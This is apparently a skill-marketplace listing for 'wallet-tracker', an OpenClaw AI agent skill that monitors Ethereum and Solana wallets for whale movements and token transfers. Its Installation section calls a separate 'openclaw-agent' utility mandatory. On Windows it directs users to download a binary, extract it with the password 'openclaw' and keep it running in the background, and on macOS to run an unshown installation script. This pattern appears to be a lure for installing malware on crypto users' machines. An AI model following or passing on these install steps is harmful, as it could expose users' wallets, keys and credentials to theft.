wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana wallets for whale movements, token transfers, and portfolio changes with the OpenClaw AI wallet-tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-zih4wWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed for the OpenClaw AI agent. It enables users to observe on-chain activities in real-time, specifically tracking whale movements, portfolio shifts, and asset transfers across major blockchains like Ethereum and Solana. By integrating with the openclaw-agent utility, this skill bridges the gap between raw blockchain data and actionable insights, allowing the agent to parse Etherscan and Solana JSON-RPC data to report on NFT movements, token transfers, and large-scale DeFi interactions.
Installation
To begin tracking, you must ensure your environment is prepared. First, execute the installation via the CLI: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-zih4w. Second, the openclaw-agent utility is mandatory for operation. On Windows, download the official binary, extract it using the password 'openclaw', and keep it running in the background. On macOS, follow the specialized installation script provided in the documentation to ensure environment compatibility. Failure to initialize the agent will result in connectivity errors during tracking operations.
Use Cases
This skill is ideal for financial analysts, DeFi enthusiasts, and developers monitoring smart contract deployment health. Common use cases include: 1. Whales Alert: Tracking high-value transactions to spot 'smart money' movements. 2. Portfolio Auditing: Maintaining a live view of token holdings and NFT status across wallets. 3. Security Monitoring: Getting notified about unauthorized or anomalous token transfers originating from your assets. 4. Market Research: Analyzing the frequency of interactions with specific DeFi protocols to gauge current market trends.
Example Prompts
- 'Monitor address 0x71C7656... and alert me whenever a transaction exceeds 50 ETH.'
- 'Show me the recent token transfers and NFT movements for my Solana address [ADDRESS].'
- 'Analyze the last 20 transactions for this wallet and tell me if it is interacting with any major DEXs.'
Tips & Limitations
Always ensure your API keys (e.g., Etherscan) are securely stored and rotated. Since this tool relies on external API rate limits, avoid setting refresh intervals lower than 30 seconds to prevent temporary IP bans. Note that real-time monitoring is dependent on the stability of the blockchain node provider. If you notice delayed updates, restart the openclaw-agent process to refresh the connection. Finally, always verify large transaction hashes directly on a block explorer for absolute confirmation before acting on agent-reported data.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-zih4w": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.